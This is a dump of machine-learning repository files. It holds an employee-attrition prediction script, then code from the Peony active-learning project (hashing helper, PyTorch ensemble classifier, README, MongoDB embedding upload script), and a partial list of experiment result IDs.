"text": "if __name__ == \"__main__\":\r\n\r\n #Importing some libraries\r\n import numpy as np\r\n import pandas as pd\r\n import os\r\n #Getting rid of pesky warnings\r\n def warn(*args, **kwargs):\r\n pass\r\n import warnings\r\n warnings.warn = warn\r\n np.warnings.filterwarnings('ignore')\r\n\r\n column_names = [\r\n \t\"Age\",\r\n\t\t\"BusinessTravel\",\t\r\n\t\t\"Department\",\r\n\t\t\"DistanceFromHome\",\r\n\t\t\"Education\",\r\n\t\t\"EnvironmentSatisfaction\",\r\n\t\t\"Gender\",\r\n\t\t\"JobInvolvement\",\r\n\t\t\"JobLevel\",\r\n\t\t\"JobRole\",\r\n\t\t\"JobSatisfaction\",\r\n\t\t\"MaritalStatus\",\r\n\t\t\"MonthlyIncome\",\r\n\t\t\"NumCompaniesWorked\",\r\n\t\t\"OverTime\",\r\n\t\t\"PercentSalaryHike\",\r\n\t\t\"PerformanceRating\",\r\n\t\t\"StockOptionLevel\",\r\n\t\t\"TotalWorkingYears\",\r\n\t\t\"TrainingTimesLastYear\",\r\n\t\t\"WorkLifeBalance\",\r\n\t\t\"YearsAtCompany\",\r\n\t\t\"YearsInCurrentRole\",\r\n\t\t\"YearsSinceLastPromotion\",\r\n\t\t\"YearsWithCurrManager\"\r\n ]\r\n #Importing the dataset\r\n location = 'final.csv'\r\n dataset = pd.read_csv(location)\r\n dataset = dataset.drop(['Unnamed: 0'],axis=1)\r\n X=dataset.iloc[:,dataset.columns !='Attrition']\r\n Y=dataset.iloc[:,dataset.columns =='Attrition']\r\n \r\n #Feature scaling\r\n from sklearn.preprocessing import StandardScaler\r\n sc_X = StandardScaler()\r\n X_train = sc_X.fit_transform(X)\r\n \r\n\r\n #Using Pipeline\r\n import sklearn.pipeline\r\n \r\n from sklearn.ensemble import RandomForestClassifier\r\n from sklearn.decomposition import KernelPCA\r\n from imblearn.pipeline import make_pipeline\r\n \r\n \r\n clf = RandomForestClassifier()\r\n kernel = KernelPCA()\r\n \r\n pipeline = make_pipeline(kernel, clf)\r\n pipeline.fit(X,Y)\r\n\r\n #User-input\r\n v = []\r\n for i in column_names[:]:\r\n v.append(input(i+\": \"))\r\n answer = np.array(v)\r\n answer = answer.reshape(1,-1)\r\n answer = sc_X.transform(answer)\r\n print (\"Predicts:\"+ str(pipeline.predict(answer)))\r\n \r\n"
}
] | 1 |
sahanmar/Peony
|
https://github.com/sahanmar/Peony
|
72d1bbce082a22ffd71c701461c70e87d7955a34
|
8dbca13d5416bf44102eaf8948cee711a1ecc085
|
5ac272348c71081de92769b1eb868a11a5ef360a
|
refs/heads/master
| 2022-09-10T02:58:41.844681 | 2022-08-29T09:19:51 | 2022-08-29T09:19:51 | 175,298,146 | 3 | 0 | null | 2019-03-12T21:21:38 | 2022-05-01T10:36:21 | 2022-08-29T09:19:51 |
Jupyter Notebook
|
[
{
"alpha_fraction": 0.6510416865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 20.33333396911621,
"blob_id": "950ad2cbebc9deba15a9314b406a969e4ed64c73",
"content_id": "529f8e9a273ae87652a0a758a2f29157ae40c7d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 9,
"path": "/Peony_project/Peony_database/src/datasets/common.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import hashlib\n\nfrom typing import List, Any\n\n\ndef create_hash(hash_args: List[Any]) -> str:\n sha = hashlib.sha256()\n sha.update(\" \".join(hash_args).encode())\n return sha.hexdigest()\n"
},
{
"alpha_fraction": 0.5785398483276367,
"alphanum_fraction": 0.5829645991325378,
"avg_line_length": 33.769229888916016,
"blob_id": "16f7d4a49eadeb69453377484109f1b40b95b7fb",
"content_id": "f2e45f79cf29783a99093565d608e6233d04caa6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3616,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 104,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/feed_forward_nn.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom typing import Optional, Tuple, List\nfrom torch.utils.data import DataLoader\n\n\nfrom Peony_box.src.peony_adjusted_models.neural_nets_architecture import (\n NeuralNet,\n NeuralNetLSTM,\n)\n\n\nNUM_ENSEMBLES = 10\nEPOCHS = 2000\n# Device configuration\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nLEARNING_RATE = 0.001\n\nneural_network = NeuralNet\n\n\nclass PeonyFeedForwardNN:\n def __init__(\n self, hidden_size: int, num_classes: int, rand_sample_ratio: int, num_ensembles: int = NUM_ENSEMBLES\n ):\n\n self.num_ensembles = num_ensembles\n\n self.model: Optional[List[NeuralNet]] = None\n self.criterion: Optional[List[nn.CrossEntropyLoss]] = None\n self.optimizer: Optional[List[torch.optim.SGD]] = None\n\n self.hidden_size = hidden_size\n self.num_classes = num_classes\n self.num_epochs = EPOCHS\n self.initialized = False\n self.rand_sample_ratio = rand_sample_ratio\n\n def fit(self, data: DataLoader, features_size: int) -> Optional[List[str]]:\n\n loss_list: List[str] = []\n\n if self.initialized is False:\n self.model = [\n neural_network(features_size, self.hidden_size, self.num_classes).to(DEVICE)\n for i in range(self.num_ensembles)\n ]\n self.criterion = [nn.CrossEntropyLoss() for i in range(self.num_ensembles)]\n self.optimizer = [\n # torch.optim.SGD(\n # self.model[i].parameters(), lr=LEARNING_RATE, momentum=0.9\n # )\n torch.optim.Adam(self.model[i].parameters(), lr=LEARNING_RATE)\n for i in range(self.num_ensembles)\n ]\n self.initialized = True\n\n initial_loss_per_ensemble: List[float] = []\n fitted_loss_per_ensemble: List[float] = []\n for index in range(self.num_ensembles):\n for epoch in range(self.num_epochs):\n\n for instances, labels in data:\n\n # Forward pass\n self.optimizer[index].zero_grad()\n outputs = self.model[index].train()(instances)\n loss = self.criterion[index](outputs, labels)\n # Backward and optimize\n loss.backward()\n self.optimizer[index].step()\n\n if epoch == 0:\n initial_loss_per_ensemble.append(loss.detach().numpy())\n fitted_loss_per_ensemble.append(loss.detach().numpy())\n loss_list.append(f\"starting loss (ensembles mean) is {np.mean(initial_loss_per_ensemble)}\")\n loss_list.append(f\"fitted loss (ensembles mean) is {np.mean(fitted_loss_per_ensemble)}\")\n\n if self.initialized:\n self.num_epochs = 20\n\n return loss_list\n\n def predict(self, data: DataLoader) -> np.ndarray:\n predicted_list = []\n for index in range(self.num_ensembles):\n with torch.no_grad():\n predicted_list.append(\n np.concatenate(\n [self.model[index].predict(instances).data.detach().numpy() for instances, _ in data],\n axis=0,\n )\n )\n return predicted_list\n\n def reset(self) -> None:\n self.initialized = False\n self.num_epochs = EPOCHS\n for index in range(self.num_ensembles):\n self.model[index].hidden.reset_parameters()\n self.model[index].output.reset_parameters()\n"
},
{
"alpha_fraction": 0.7901408672332764,
"alphanum_fraction": 0.8077464699745178,
"avg_line_length": 60.69565200805664,
"blob_id": "cb6d135ca49929806bf34c4053880e2441b874b5",
"content_id": "eadce5f7a85e0bd26842d04b907f7a90135aef79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1421,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 23,
"path": "/Peony_project/README.md",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Project Architecture\n\n## Database\n\n\n\nIn order to make everything consistent and let the models work with the same input format we decided to create a database that will store all the data in JSON format for the purposes of machine learning and visualizing components. \n\n[Peony Database Architecture](https://github.com/sahanmar/Peony/blob/peony_project_documentation/Peony_project/peony_database/README.md)\n\n## PeonyBox\n\n\n\nPeonyBox is a name for a machine learning component of the project. It takes an input from a database, processes it, and then saves an output to the database. In PeonyBox it will be possible train, test and save the models for further usage.\n\n## Visualization\n\n\n\nVisualization is third part component of this project that takes the data from the database (which were previously uploaded there from PeonyBox) and gives statistics and curves that help to measure quality of models.\n\n[Peony Visualization Component](https://github.com/sahanmar/Peony/tree/peony_project_documentation/Peony_project/Peony_visualization)\n\n"
},
{
"alpha_fraction": 0.6899619102478027,
"alphanum_fraction": 0.6899619102478027,
"avg_line_length": 21.485713958740234,
"blob_id": "7fbce13e60933157e3ff1c2c3b5c61b8d73f099b",
"content_id": "0d8bf7805e31d30c5b2fe26182b51fabee85eeee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 787,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 35,
"path": "/Peony_project/Peony_database/src/pretrained_models/upload_pretrained_models_2_mongo.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom pathlib import Path\nfrom PeonyPackage.PeonyDb import MongoDb\n\n# Imports for datasets upload\nfrom embeddings.fasttext_embeddings import (\n COLLECTION_NAME as fasttext_collection_name,\n transorm_data as fasttext_transformer,\n load_data as fasttext_loader,\n)\n\n# args for different datasets\ndef input_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--fasttext\", help=\"Path to fasttext pretarained model\")\n return parser\n\n\n# upload to mongo\ndef main():\n args = input_args().parse_args()\n\n api = MongoDb()\n\n api.load_data_to_database(\n fasttext_collection_name,\n Path(args.fasttext),\n fasttext_loader,\n fasttext_transformer,\n )\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48064759373664856,
"alphanum_fraction": 0.6814382672309875,
"avg_line_length": 91.5435562133789,
"blob_id": "2e4691142d71c94da07b15e7ac605ff8217cb05a",
"content_id": "85cac47a230ed58c676c7140a938281d3c18f66d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26560,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 287,
"path": "/Peony_project/Peony_visualization/src/batch_active_learning_article/result_ids.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "DATA = [\n [\"6244a5af0ab887b10a47dee1\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"6244ba9b0ab887b10a47dee2\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"6244cf050ab887b10a47dee3\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"6244df1c0ab887b10a47dee5\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"6244e70e0ab887b10a47dee6\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"6244d6fb0ab887b10a47dee4\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"625abd55651a5be997ecbca3\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625ad5dc651a5be997ecbca4\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625ae75f651a5be997ecbca6\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"625af024651a5be997ecbca7\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"625adeb8651a5be997ecbca5\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6244d26e4b505e4d973c3070\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"6244f4574b505e4d973c3071\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"624511024b505e4d973c3072\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"6245285c4b505e4d973c3074\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"624534234b505e4d973c3075\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"62451cb64b505e4d973c3073\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625aced50d3655e467156f45\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625af81a0d3655e467156f46\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625b15b80d3655e467156f48\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625b24800d3655e467156f49\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625b06c50d3655e467156f47\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"62453ad28716941057c12d2d\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"62457aca8716941057c12d2e\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"6245bbde8716941057c12d2f\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"6245ed7d8716941057c12d31\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"624606478716941057c12d32\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"6245d4b68716941057c12d30\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"6249f1e48f5267837b16b4f0\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"hac_entropy\"],\n [\"624baa128f5267837b16b4f1\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"hac_bald\"],\n [\"624f28338f5267837b16b4f3\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"entropy\"],\n [\"6250b0d58f5267837b16b4f4\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"bald\"],\n [\"624d45e88f5267837b16b4f2\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"random\"],\n [\"6258b3f7d7f2411f6d3df292\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"625912cdd7f2411f6d3df293\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"625969c0d7f2411f6d3df295\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"625996e9d7f2411f6d3df296\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"62593cc6d7f2411f6d3df294\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"62624e57c0d83a69a354bc4b\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"625e31bd8ece41572e440e1f\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"625ec67c8ece41572e440e20\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"625f458d8ece41572e440e22\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"625f78e38ece41572e440e23\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"625f114c8ece41572e440e21\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"62590b05096fc9f74a546de4\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"6259bc6b096fc9f74a546de5\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625a42a8096fc9f74a546de7\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625a7477096fc9f74a546de8\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625a07c5096fc9f74a546de6\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62b0574a038c49ce149b8594\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62b03d57038c49ce149b8593\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a8b8ee468e0388210f239d\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a877a1468e0388210f239c\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a4102d68f6ed5a8557a361\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a37a6768f6ed5a8557a360\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62abf28fcd24307315918227\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62aac4d6cd24307315918226\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"62442f786d577d72f4c9cb3f\", \"Gibberish\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"624444db6d577d72f4c9cb40\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"624459176d577d72f4c9cb41\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"624469106d577d72f4c9cb43\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"624471c26d577d72f4c9cb44\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"624460f96d577d72f4c9cb42\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"625bdc04c24175962261e1f7\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625bf4a8c24175962261e1f8\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625c076fc24175962261e1fa\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"625c10e3c24175962261e1fb\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"625bfe13c24175962261e1f9\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6251b7e852c1e4b7dbf2c088\", \"Gibberish\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"6251e42552c1e4b7dbf2c089\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"62520fd352c1e4b7dbf2c08a\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"6252340d52c1e4b7dbf2c08c\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"6252461b52c1e4b7dbf2c08d\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"6252225a52c1e4b7dbf2c08b\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625bedd574f4631926b7a097\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625c17d574f4631926b7a098\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625c36d874f4631926b7a09a\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625c464e74f4631926b7a09b\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625c275674f4631926b7a099\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624357f1eed21de5abc21a47\", \"Gibberish\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"62421662d4099c6fb6d2defd\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"62425696d4099c6fb6d2defe\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"62428dc9d4099c6fb6d2df00\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"6242adb3d4099c6fb6d2df01\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"62427215d4099c6fb6d2deff\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"625b01f4545ec1d0d14d9c93\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"625b4963545ec1d0d14d9c94\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"625b7e00545ec1d0d14d9c96\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"625b9844545ec1d0d14d9c97\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"625b63ac545ec1d0d14d9c95\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"6253589525deac12f81105b6\", \"Gibberish\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"625409e125deac12f81105b7\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"6254c3a825deac12f81105b8\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"62556dd825deac12f81105ba\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"6255cd7b25deac12f81105bb\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"625511c925deac12f81105b9\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625b45d2c86c08c674ae48d7\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"625bc540c86c08c674ae48d8\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625c5a32c86c08c674ae48da\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625c926fc86c08c674ae48db\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625c177ec86c08c674ae48d9\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62ae0c73667a85ff7d1d61b5\", \"Gibberish\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62adec61667a85ff7d1d61b4\", \"Gibberish\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a8b79e9e598b9074d3d71a\", \"Gibberish\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a877199e598b9074d3d719\", \"Gibberish\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a6726c8a92b7bfcc6e8f3e\", \"Gibberish\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a5fb518a92b7bfcc6e8f3d\", \"Gibberish\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62abebbd71cf023197c7a0c7\", \"Gibberish\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62aabf8671cf023197c7a0c6\", \"Gibberish\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"62442f002f3c8041223f43d5\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"624444ee2f3c8041223f43d6\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"62445a892f3c8041223f43d7\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"62446a5c2f3c8041223f43d9\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"624473162f3c8041223f43da\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"624462752f3c8041223f43d8\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"6257e949d84f0f0020d555f5\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625801b9d84f0f0020d555f6\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625812efd84f0f0020d555f8\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"62581b92d84f0f0020d555f9\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"62580a44d84f0f0020d555f7\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"62520153b8254c1daff50da9\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"62522e29b8254c1daff50daa\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"625257fab8254c1daff50dab\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"625276ebb8254c1daff50dad\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"6252867ab8254c1daff50dae\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"6252676bb8254c1daff50dac\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625794b2aaec99543b94fe28\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"6257c170aaec99543b94fe29\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"6257fb65e99cc6b47d2d09b3\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"62584f70e99cc6b47d2d09b7\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625832a4e99cc6b47d2d09b5\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624358bab320121da6e21314\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"624217f136633ec11e03cb67\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"624259b736633ec11e03cb68\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"624290c636633ec11e03cb6a\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"6242b17c36633ec11e03cb6b\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"6242753136633ec11e03cb69\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"624b855e698214ee3d0ca7fd\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"hac_entropy\"],\n [\"624c922f698214ee3d0ca7fe\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"hac_bald\"],\n [\"624e4d03698214ee3d0ca800\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"entropy\"],\n [\"624f363c698214ee3d0ca801\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"bald\"],\n [\"624d56c5698214ee3d0ca7ff\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"random\"],\n [\"624c2233dee2c2fdc2e880b9\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"624c5d31dee2c2fdc2e880ba\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"624c6bbbdee2c2fdc2e880bc\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"624c7306dee2c2fdc2e880bd\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"624c6478dee2c2fdc2e880bb\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"6255f8de0f37c55260d47b05\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"6258833ccd211ead437e7f02\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"62593d91cd211ead437e7f03\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"6259dd44cd211ead437e7f05\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"625a250dcd211ead437e7f06\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"6259935acd211ead437e7f04\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625881458e9230fdf1ade53b\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"6259399c8e9230fdf1ade53c\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"6259d8a88e9230fdf1ade53e\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625a20d68e9230fdf1ade53f\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"62598efb8e9230fdf1ade53d\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62ac6e147420eb1f9cbcf13a\", \"Amazon Review 3, 5\", 